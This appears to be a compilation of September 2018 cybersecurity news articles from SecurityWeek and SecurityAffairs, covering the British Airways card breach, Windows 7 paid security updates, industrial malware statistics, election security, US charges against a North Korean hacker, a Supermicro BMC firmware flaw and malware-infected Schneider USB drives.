Microsoft to Charge for Windows 7 Security Updates
8.9.2018 securityweek Security

Microsoft this week revealed plans to offer paid Windows 7 Extended Security Updates (ESU) for three years after traditional support for the operating system will officially end.

Released in 2009, Windows 7 currently powers around 39% of all machines running Microsoft’s Windows platform, but is slowly losing ground to Windows 10 (currently found on over 48% of Windows systems).

Microsoft stopped selling Windows 7 in 2014 (some variants are still available to OEMs) and ended mainstream support for the operating system in early 2015. The company plans on ending extended support for Windows 7 to January 14, 2020.

Past that date, organizations will have to pay in order to continue take advantage of support for the platform.

Paid Windows 7 Extended Security Updates (ESU), Microsoft now says, will be available through January 2023. The tech company will sell the Windows 7 ESU on a per-device basis and plans on increasing the price for it each year.

“Windows 7 ESUs will be available to all Windows 7 Professional and Windows 7 Enterprise customers in Volume Licensing, with a discount to customers with Windows software assurance, Windows 10 Enterprise or Windows 10 Education subscriptions,” Microsoft says.

The software giant also revealed that it will continue to provide support for Office 365 ProPlus on devices with active Windows 7 Extended Security Updates (ESU) through January 2023. This means that all those buying the Windows 7 ESU will continue to run Office 365 ProPlus.

January 2023, which is the end support date for Windows 8.1, also represents the end support date for Office 365 ProPlus on this platform version, Microsoft now reveals. Windows Server 2016, on the other hand, will offer support for Office 365 ProPlus until October 2025.

Currently, Microsoft is relying on a semi-annual schedule for Windows 10 and Office 365 ProPlus updates, targeting September and March, and the company will continue using this Windows 10 update cycle.

To make sure customers have enough time to plan for updates within their environments, however, Microsoft is making changes to the support life of Windows 10 updates.

Thus, currently supported feature updates of Windows 10 Enterprise and Education editions (versions 1607, 1703, 1709, and 1803) will be supported for 30 months from their original release date. As for future feature updates, those targeted for a September release will be supported for 30 months, while those targeted for a March release for 18 months.

According to Microsoft, all feature releases of Windows 10 Home, Windows 10 Pro, and Office 365 ProPlus will continue to be supported for 18 months, regardless of whether targeted for release in March or September.


BA Scrambles to Address Theft of Passenger Bank Details
8.9.2018 securityweek Incindent

British Airways will financially compensate customers whose data were stolen in a "sophisticated" and "malicious" hack, chief executive Alex Cruz said Friday as he apologised for the fiasco.

BA late Thursday revealed that personal and financial details of customers who booked flights on the group's website and mobile phone app between August 21 and Wednesday had been stolen.

The revelation comes just a few months after the European Union tightened data protection laws.

"We're extremely sorry for what has happened," Cruz told the BBC on Friday.

"There was a very sophisticated, malicious, criminal attack on our website."

BA took out full-page adverts in the UK newspapers on Friday to apologise to customers, while the share price of parent group IAG was down more than three percent in London deals.

"We are 100 percent committed to compensate them," Cruz said.

"We will compensate them for any financial hardship that they may have suffered," he told the broadcaster.

BA said it had launched an urgent investigation after realising that about 380,000 bank cards used to book its flights had been hacked.

The stolen data comprised customer names, postal addresses, email addresses and credit card information.

However the 15-day breach did not involve travel or passport details and has been fixed, the airline added.

- Regulators investigate -

"The moment we found out (Wednesday) that actual customer data had been compromised, that's when we began an all out immediate communication to our customers. That was our priority," Cruz said.

However Enza Iannopollo, privacy and security analyst at advisory group Forrester, said BA could have done better on informing those affected.

"If the timeline is confirmed and BA became aware of the breach on the evening of September 5th, then they have done their breach notification on time, which is of course a good thing," she said in a statement.

"However, customers are obviously not impressed about BA breach management at present. Some discovered it on social media, others reported wasting hours on the phone with their bank, everyone expects more from a company that truly cares about its customers."

"Terrible handling of the situation," tweeted one affected customer, Mat Thomas.

Iannopollo told AFP that it was too early to know whether BA would be fined over the affair.

"Regulators will assess the circumstances of this breach consistently with GDPR requirements," she said referring to the EU's General Data Protection Regulation that came into force in May.

Britain's National Crime Agency said it was assessing the matter, while the UK's data protection watchdog, the Information Commissioner's Office, will make its own enquiries.

"The ICO will do its assessment and investigation to determine whether to levy a fine or impose any enforcement action, but this will take some time and it might be that the regulator determines that rules were not breached," Iannopollo said.

About 1100 GMT, shares in IAG, which runs also Spanish carriers Iberia and Vueling as well as Irish airline Aer Lingus, were down 3.5 percent at 657.60 pence on London's benchmark FTSE 100 index, down 0.8 percent overall.

"Today's news is a reminder of just what a hot issue cyber security remains and the importance of companies having the right protections in place to mitigate the risk posed by attacks," noted Russ Mould, investment director at AJ Bell.


Malware on ICS Increasingly Comes From Internet: Kaspersky
8.9.2018 securityweek ICS

Kaspersky Lab products installed on industrial automation systems have detected over 19,000 malware samples in the first half of 2018, and the company has determined that the Internet is an increasingly significant source of attacks.

According to Kaspersky’s “Threat Landscape for Industrial Automation Systems” report for H1 2018, the company detected over 19,400 samples belonging to roughly 2,800 malware families. As expected, most of the attempts to infect industrial systems were part of random attacks rather than targeted operations.

An overall increase in malicious activity has led to attack attempts against 41.2% of the industrial control systems (ICS) protected by the security firm, which represents an increase of nearly 5 percentage points compared to the first half of 2017. Kaspersky detected 18,000 malware samples belonging to more than 2,500 families in that period.

Attacks were reported all around the world, but Asian, Latin American and North African countries had the highest percentage of attacked ICS computers, with up to 75% of devices targeted. In the United States, only 21.4% of industrial systems were targeted. Kaspersky noted that developed countries had recorded fewer attacks compared to ones with a low per capita GDP.

ICS attacks in H1 2018

A majority of the detected threats were Trojans using either Windows or web browsers as a platform.

“In H1 2018, threat actors continued to attack legitimate websites that had vulnerabilities in their web applications in order to host malware components on these websites,” Kaspersky said in its report. “Notably, the increase in the percentage of ICS computers attacked through browsers in H1 2018 was due to the increase in the number of attacks that involved JavaScript cryptocurrency miners. At the same time, the increase in the number of ICS computers attacked using Microsoft Office documents was associated with waves of phishing emails.”

The security firm determined that the Internet was the source in 27.3% of attacks, which represents an increase of nearly 7 percentage points compared to the same period of last year. Removable media accounted for 8.4% and email clients for 3.8% of attacks, with no significant changes compared to the prior period.

“This pattern seems logical: modern industrial networks can hardly be considered isolated from external systems. Today, an interface between the industrial network and the corporate network is needed both to control industrial processes and to provide administration for industrial networks and systems,” Kaspersky said.

Asia, Africa and Latin America are not only the most targeted, but they also represent the main sources of threats blocked by Kaspersky’s products.


Homeland Security Head: Colorado Tops US in Vote Security
8.9.2018 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kristjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among them, she said, her department wants all 50 states to conduct postelection risk-limiting audits, which strictly ensure the accuracy of vote counts, by 2020. It's standard practice in Colorado.

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

It's invested in new vote tabulating machines and creates a separate paper trail of each ballot cast. Since 2013, it's required two-factor authentication for elections systems operators to access equipment. The secretary of state's office has more internet technology staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough, involving, among a cascade of other problems, attempts to hack voter rolls, detect possible malware planted in voting systems weeks beforehand, phishing and responding to social media posts claiming systems were hacked or voters turned away. The exercise concerned both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state responding or devising responses to the disaster scenarios: Def Con hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."


Talking Global Cyberwar With Kaspersky Lab's Anton Shingarev
8.9.2018 securityweek CyberWar

Cyber War

Theory Suggests we Need to Come to the Very Brink of Cyberwar Before Humanity Backs Down and Finds a Solution

Security firms take a keen interest in the evolution of no-longer fanciful cyberwar -- they will be our first line of defense. Kaspersky Lab takes a particular interest, being both a defender and one of the first victims of this evolution. SecurityWeek spoke to Anton Shingarev, Kaspersky Lab's VP of public affairs.

First, we must understand where we currently stand. Discounting the rogue nations like North Korea and perhaps Iran (more on which later), there is no current cyberwar. There is intrusive surveillance and cyber espionage between potential adversaries -- but that has always been the case.

In May 1960 a U.S. high altitude spy plane was shot down by Russia while flying in Russian air space. That was very intrusive surveillance with a serious result -- but it did not lead to all-out kinetic warfare between the adversaries. The Cold War never became a Hot War (apart from what could be considered firefights in Korea and Vietnam) because of an intricate set of bi-lateral and international agreements.

We may have entered the early stages of a state of Cold Cyberwar, but Shingarev hopes and expects that the same type of bilateral and international cyber agreements will prevent a Hot Cyberwar developing and ultimately spilling into a full-scale kinetic war.

This won't prevent serious and damaging effects on the way. Just as the physical globe was balkanized into the major spheres of influence (the U.S. sphere, the Russian sphere, the so-called non-aligned group, and always on the outside, perhaps China), so too is the global internet being balkanized (and to a certain extent along similar geo-political lines).

Kaspersky Lab is a victim of this balkanization. Different regions are promoting local technology over global technology firms, and increasingly distrusting technologies they cannot control. At its worst, whole nations are firewalling themselves from the global internet -- such as China, Iran and North Korea. Even without such firewalls, individual nations place controls on foreign technologies.

Kaspersky Lab is an example. While not being prohibited from use by the people and commerce in general, it is increasingly excluded from western government agencies https://www.securityweek.com/trump-signs-bill-banning-kaspersky-products . There is no proof of wrongdoing, nor is any needed. It is simply a political effect of geo-political balkanization in an era of cold cyberwar. Nor is it one-sided. Other countries prohibit or limit foreign products, and many countries are demanding back doors into a range of communications products.

Right now, things seem to be getting worse. Across the globe, more than 30 countries have officially announced they have a military cyber-division, and verbal threats and counter threats are common. In May of this year, Air Marshall Phil Collins (Chief of Defence Intelligence, UK Ministry of Defence) made the case https://www.securityweek.com/uk-warns-aggressive-cyberattack-could-trigg... for pre-emptive cyber strikes without ruling out pre-emptive kinetic strikes. In the face of "continuous full spectrum competition and confrontation", he said the UK's response "should be to understand first, to decide first, and then if necessary to act first, across the physical and virtual, to secure decision advantage and then operational advantage, seeking swift yet controlled exploitation of vulnerabilities and the proactive denial of opportunities."

In the U.S., in August 2018, the Wall Street Journal reported that President Trump had reversed Obama-era rules on the deployment of cyber weapons -- effectively making it easier for the Pentagon to launch its own cyber-attacks. In October 2017, it was reported that the U.S. Cyber Command had launched a DDoS attack against North Korea's military spy agency, the Reconnaissance General Bureau (RGB).

But despite worsening global tensions, despite increasing balkanization and protectionism, despite Kaspersky Lab being an early victim of this Cold Cyberwar, Anton Shingarev remains hopeful that it can be contained and will not spill over into active kinetic warfare. He draws a parallel with the nuclear threat that came with the original Cold War.

Each side stockpiled nuclear weapons to threaten the other. "But once it was realized that use of these weapons would only guarantee mutual destruction, the world pulled back through bilateral and international agreements," he said. It hasn't rid the world of nuclear weapons, but they are now kept primarily as a deterrence, maintaining the threat of mutual destruction in order to keep the peace.

We haven't reached that stage in cyber yet. Nations are stockpiling cyber weapons in a threatening manner. There are no bilateral or international agreements (apart from existing international law) that will prevent a first or pre-emptive strike. We haven't yet reached the brink of mutual cyber destruction.

Shingarev has no confidence in current attempts to find an international solution. Microsoft has been to the forefront of these, first proposing international norms of behavior and then wrapping these into a call for a Cyber Geneva Convention. "Nothing has happened," said Shingarev -- and nothing is likely to happen. Microsoft is calling for international cyber disarmament, which is as likely as the decades-old calls for international nuclear disarmament.

Shingarev believes the way forward will come from bilateral agreements between the world's cyber superpowers, like the 1991 START (Strategic Arms Reduction Treaty) between the U.S. and Russia. Such agreements will be supported by mutual assistance treaties, like the UN and even NATO. These treaties will protect members from rogue countries who refuse to join a no cyber-strike agreement, or simply ignore it. In theory, it could mean that rogue states like North Korea and perhaps Iran would be punished by the rest of the world, while tiny nation states like Singapore would be protected from aggressors.

Such an approach has succeeded in preventing a nuclear war. Shingarev believes it could prevent an all-out cyberwar that could potentially spill into a kinetic war. But it is brinkmanship of the first order -- the theory suggests we need to come to the very brink of that cyberwar before humanity backs down and finds a solution.


Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.2018 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also unlikely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting to it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible boarders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as the securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”


Flaw in update process for BMCs in Supermicro servers allows to deliver persistent malware or brick the server
7.9.2018 securityaffairs
Vulnerebility

A team of security researchers discovered a vulnerability in the baseboard management controller (BMC) hardware used by Supermicro servers.
Researchers from security firm Eclypsium have discovered a vulnerability in the firmware update mechanism that could be exploited by hackers to deliver persistent malware, completely wipe and reinstall of the operating system.

“Using the vulnerabilities we discovered, it is possible to make arbitrary modifications to the BMC code and data. Using these modifications, an attacker can run malicious software within these highly privileged management controllers. This could be useful, for example, to survive operating system reinstallation or communicate covertly with the attacker’s infrastructure, similar to the PLATINUM malware that used manageability features to bypass detection.” reads the advisory published by the expert.

“Alternatively, this vulnerability could be used to “brick” (permanently disable) the BMC or the entire system, creating an impact even more severe than the BlackEnergy KillDisk component.”

Supermicro server BMCs

The Baseboard Management Controllers (BMCs) are part of the server motherboard and are used to directly control and manage the various hardware components of the system. It could be used to repair or reinstall the system software and it could be remotely controlled by administrators.

The BMCs are a privileged target of hackers because they operate at low level, below the level of the host OS and system firmware.

Experts discovered that the update mechanism doesn’t implement a code signing verification mechanism either check if the firmware is downloaded from a legitimate source.

The exploitation of the flaw could allow attackers to run malicious code that is transparent to OS-level antimalware solutions.

The attack scenario sees hackers in a position to carry out man-in-the-middle attacks, this means that they have to be able to access the traffic during the update process.

“Our research has uncovered vulnerabilities in the way that multiple vendors update their BMC firmware. These vendors typically leverage standard, off-the-shelf IPMI management tools instead of developing customized in-house management capabilities.” continues the analysis.

“In this case, we will go deep into the BMC update process on Supermicro systems, we found that the BMC code responsible for processing and applying firmware updates does not perform cryptographic signature verification on the provided firmware image before accepting the update and committing it to non-volatile storage. This effectively allows the attacker to load modified code onto the BMC.

The researchers highlighted that attackers could exploit the flaw to permanently brick the BMC or the entire server.

“Because IPMI communications can be performed over the BMC LAN interface, this update mechanism could also be exploited remotely if the attacker has been able to capture the admin password for the BMC,” Eclypsium added.

“This requires access to the systems management network, which should be isolated and protected from the production network. However, the implicit trust of management networks and interfaces may generate a false sense of security, leading to otherwise-diligent administrators practicing password reuse for convenience.”

The researchers have reported the flaw Supermicro that addressed it by implementing signature verification to the firmware update tool.


British Airways hacked, attackers stole details of 380,000 customers
7.9.2018 securityaffairs Incindent

Personal and payment card information of 380,000 British Airways customers were stolen by attackers, stolen data did not include travel or passport details.
British Airways was hacked, customer personal and payment card information of 380,000 were stolen by attackers, the stolen data did not include travel or passport details.

The company published a data breach notification on its website, the security breach affected customers making bookings on its website and app from 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive.

British Airways has launched an internal investigation and notified the police and relevant authorities.

“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.” reads the data breach notification.

“From 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive, the personal and financial details of customers making bookings on our website and app were compromised.”

The airline confirmed that the breach has been resolved and its services are now working normally. British Airways is communicating with affected customers and is recommending customers who believe they may have been affected by the breach to contact their banks or credit card providers.

A spokesperson told the TechCrunch website that “around 380,000 card payments” were stolen.

“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.” said Alex Cruz, British Airways’ chairman and chief executive.

Privacy advocated and security experts believe the company could face severe fines due to the new European GDPR data protection laws.

In March 2015, British Airways Executive Club member accounts were hacked, it wasn’t a data breach because hackers used credentials available in the underground.


USB Drives shipped with Schneider Solar Products were infected with malware
7.9.2018 securityaffairs
Virus

Schneider Electric announced that some of the USB drives it has shipped with its Conext ComBox and Conext Battery Monitor products were infected with malware.
Schneider Electric has found a malicious code on the USB drives that have been shipped with Conext ComBox and Conext Battery Monitor products.

Both products are part of the solar energy offering of the vendor. ComBox is a communications and monitoring device for installers and operators of Conext solar systems. Conext Battery Monitor indicates hours of battery based runtime and determines battery bank state of charge.

The tainted drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).

Schneider revealed that the USB drives were infected with a malware during manufacturing at a third-party supplier’s facility.

“Schneider Electric is aware that USB removable media shipped with the Conext Combox and Conext Battery Monitor products may have been exposed to malware during manufacturing at a third-party supplier’s facility.” reads the security advisory published by the company.

Schneider Electric USB Drives

The good news for customers is that the malware that was found on the USB drives was easy to detect for almost any anti-virus software, anyway the company is recommending customers to not to use them and “securely discard” the infected devices.

“Schneider Electric has confirmed that the malware should be detected and blocked by all major anti-malware programs. Out of caution, Schneider Electric recommends that these USB removable media are not used.” continues the advisory.

“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products,”

Users who believe they may have used the infected USB drives must scan their system for the presence of the malicious code.

At the time it is not clear the extent of the incident, anyway, this case is just the latest in a series of supply chain attacks observed in the last years.

We reported several cases of pre-installed malware and also cases quite similar to this one, like the one that involved last year IBM Storwize shipped with infected initialization USB drives.


US charges North Korea agent over Sony Pictures hack and WannaCry
7.9.2018 securityaffairs CyberCrime

The U.S. Department of Justice charged a North Korea agent over WannaCry and 2014 Sony Pictures Entertainment Hack.
The U.S. Department of Justice announces charges against a North Korean government spy that was involved in the massive WannaCry ransomware attack and the 2014 Sony Pictures Entertainment hack.

“the Justice Department charged on Thursday in a 174-page criminal complaint that detailed how hackers caused hundreds of millions of dollars’ worth of damage to the global economy.” states the NYT.

“Only one North Korean, Park Jin-hyok, was named — charged with computer fraud and wire fraud in the 2014 hack of Sony Pictures Entertainment.”

north korea sony hack-3

The individual charged by the US DoJ is Park Jin Hyok, an expert that works for North Korean military intelligence agency Reconnaissance General Bureau (RGB).

The man, also known as Pak Jin Hek, is also linked to the dreaded Lazarus APT Group.

The complaint against Mr. Park was filed under seal on June 8, just a few days before the summit meeting between Trump and Mr. Kim in Singapore.

The complaint also reports of a hacking unit working for North Korea’s intelligence agency, that operates out of China and other Asian nations
The 2014 Sony Pictures Entertainment hack was carried out by Pyongyang in retaliation for the production of the comedic film “The Interview” that mocks the North Korean leader Kim Jong Un.

At the time, the US law enforcement suspected the involvement of North Korea’s Unit 121, which is the group of hackers working under the direction of the General Bureau of Reconnaissance.

North Korea sony hack

Hackers wiped many computers from the company and exfiltrated over 200GB of sensitive data, including upcoming movie scripts, celebrities phone numbers, employees data versions of then-unreleased films.
WannaCry infected 200,000 computers across 150 countries in a matter of hours after the beginning of the massive attack, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

The ransomware infected systems in any industry and also targeted critical infrastructures such as hospitals and banks.

The US intelligence highlighted that North Korea hackers were free to operate from Chine. Chosun Expo Joint Venture helped fund North Korean hacking groups by covering their activities with legitimate programming work from an office in Dalian, China. According to the complaint, some customers were aware the employees “were North Korean computer programmers connected to the government.”
Mr. Park, who worked there from 2011 to 2013, and his colleagues were overseen by a company manager and North Korean political attaché́, the Justice Department said.

Hyok worked in China from at least 2011 to 2013 and returned to North Korea shortly before the attack against Sony Pictures in November 2014.

The investigation is still ongoing, this kind of investigations are very difficult and cannot leverage classified information from the intelligence agencies

“In order to get admissible evidence,” John Carlin, the former head of the Justice Department’s National Security Division, “prosecutors have to work through any issues the intelligence community might have.”


British Airways Hacked With Details of 380,000 Cards Stolen
7.9.2018 securityweek Incindent

British Airways said Thursday that the personal and financial details of customers making bookings between August 21 and September 5 were stolen in a data breach involving 380,000 bank cards.

"We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details," the airline said in a statement.

"The personal and financial details of customers making bookings on our website and app were compromised," it said.

"The breach has been resolved and our website is working normally. We have notified the police and relevant authorities.

"We are deeply sorry for the disruption that this criminal activity has caused."

BA said the breach took place between 2158 GMT on August 21 and 2045 GMT on September 5.

Around 380,000 payment cards were compromised.

BA advised anyone who believed they may have been affected to contact their bank or credit card provider and follow their recommendations.

As for compensation, BA said: "We will be contacting customers and will manage any claims on an individual basis."

It said customers due to travel could check in online as normal as the incident had been resolved.

The National Crime Agency said: "We are aware of reports of a data breach affecting British Airways and are working with partners to assess the best course of action."

The NCA is set up to tackle the most serious and organised crime posing the highest risk to public security in Britain.

- Past IT issues -

BA apologised in July after technology issues caused dozens of its flights to and from London Heathrow Airport to be cancelled.

The airline said the problem was down to an incident with an IT system.

And in May 2017, British Airways suffered a major computer system failure triggered by a power supply issue near Heathrow which left 75,000 customers stranded.

IAG, which owns British Airways and Spanish carrier Iberia, said last month that first-half profits more than doubled.

Earnings after taxation flew to 1.4 billion euros ($1.6 billion) in the first six months of 2018 compared with 607 million euros a year earlier, IAG said in a results statement.

The London-listed group, which is also the owner of Irish airline Aer Lingus and Spanish carrier Vueling, added that total revenues swelled three percent to 11.2 billion euros.

BA announced last month that it will halt flights to Tehran in September, citing low profitability as the US reimposes sanctions on Iran.


Fighting Alert Fatigue With Security Orchestration, Automation and Response
7.9.2018 securityweek Security

New research confirms and quantifies two known challenges for security operations teams: they don't have enough staff and would benefit from automated tools.

Demisto's State of SOAR (security orchestration, automation and response) Report, 2018 (PDF) was researched via the ViB community of more than 1.2 million IT practitioners and decision makers. A total of 262 security professionals from 245 companies in a wide range of industry sectors and sizes, mostly in the U.S., took part in the survey. The results show that the two primary and related challenges for SOC and IR staff are not enough time (80.39% of respondents) and too few staff (78.76%) to handle the workload.

“We’ve seen plenty of research that highlights the unending growth in security alerts, a widening cyber security skills gap, and the ensuing fatigue that is heaped upon understaffed security teams," explains Rishi Bhargava, Co-founder of Demisto. "That’s why we conducted this study which allowed us to dig deeper into these issues, their manifestations, as well as possible solutions. Our results produced captivating insights into the state of SOAR in businesses of all sizes.”

"The pattern that stands out starkly from these results," notes the report, "is that the security skills gap continues to be a challenge." The finer detail of these results, however, is less expected: retaining staff is not much easier than finding them (60.1% against 75.2%). Sixty-seven percent of security staff move on to new companies in less than four years, with 26.4% leaving within two years.

This is primarily down to money. Nearly 65% of those who leave their current employment do so because they can earn more elsewhere. Furthermore, asked what is important to infosec employees, 71.26% replied, a 'higher salary'. The often lauded 'company culture' ranked only fifth in importance at 49.43%.

The implication is that smaller companies with smaller budgets hire newcomers, train them and provide the experience that is attractive to larger companies who simply poach experienced security staff with more money. This in turn means that it is the smaller business that is most affected by the overall security skills gap.

